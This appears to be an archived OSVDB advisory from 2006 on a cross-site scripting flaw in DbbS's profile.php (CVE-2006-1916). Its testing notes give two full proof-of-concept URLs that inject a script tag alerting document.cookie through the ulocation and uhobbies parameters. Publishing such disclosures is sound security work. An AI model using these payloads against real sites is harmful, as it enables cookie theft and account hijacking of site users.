DbbS profile.php Multiple Variable XSS

2006-04-16T03:03:42
ID OSVDB:24958
Type osvdb
Reporter OSVDB
Modified 2006-04-16T03:03:42

Description

Manual Testing Notes

http://[target]/DbbS/profile.php?mode=edit&myid=1&ulocation="><script>alert(document.cookie)</script> http://[target]/DbbS/profile.php?mode=edit&myid=1&uhobbies="><script>alert(document.cookie)</script>

References:

Vendor URL: http://www.dbbs.sup.fr/ Related OSVDB ID: 24957 Related OSVDB ID: 24956 Related OSVDB ID: 24955 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-04/0327.html CVE-2006-1916 Bugtraq ID: 17559